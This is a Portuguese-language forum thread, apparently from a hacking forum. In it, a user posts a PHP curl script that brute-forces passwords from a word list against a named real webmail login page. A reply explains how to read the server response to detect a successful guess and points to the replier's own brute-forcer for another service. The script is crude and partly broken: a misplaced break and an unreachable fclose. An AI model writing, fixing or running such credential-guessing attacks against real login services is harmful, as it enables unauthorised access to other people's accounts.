BruteForce Curl

[Dan!el]

Olá novamente pessoal,

Estou tentando fazer um script para enviar varias requisições de login e me voltar password correto.

No entanto eu nao sei com o curl pegar a resposta do servidor, e estou fazendo desse modo do script,
mais como sou meio novo não to conseguindo nem fazer envio post com a variavel no arquivo.txt
que contém as possiveis senhas, não sei porque mais não carrega a variavel na string oque pode
estar errado ?

Código Selecionar Expandir



<?php
  $fh = fopen("lista.txt", "r");
  while(!feof($fh)) {
   $curl = curl_init();
   $pass = fgets($fh,1024);
   //$data = fread($fh, filesize('lista.txt'));

   curl_setopt($curl, CURLOPT_URL,"http://webmail.itelefonica.com.br/cgi-bin/emslogin.cgi");
   curl_setopt($curl, CURLOPT_POST, 1);
   curl_setopt($curl, CURLOPT_POSTFIELDS, "PASSWD=$pass&LOGIN=user");

   curl_exec ($curl);
   curl_close ($curl);
}   
   break;
  fclose($fh);

?>


[Fvox]

Hi.

Tópico antigo, mas ainda é o segundo da sessão. Então não podemos considerar um up, certo? =P
Vou responder apenas a nível de conhecimento. Provavelmente o autor já resolveu o problema hahah.

By the way, o resultado da requisição é retornado pela função curl_exec($ch). No seu caso, provavelmente o site vai retornar um HTML. A partir da mensagem que este HTML mostra, você pode verificar se a senha foi validada ou não.

Como base, dá pra usar um brute force que fiz para o rapidshare há uns anos. A lógica é a mesma:
http://www.forum.darkers.com.br/index.php?topic=10145.0

[]'s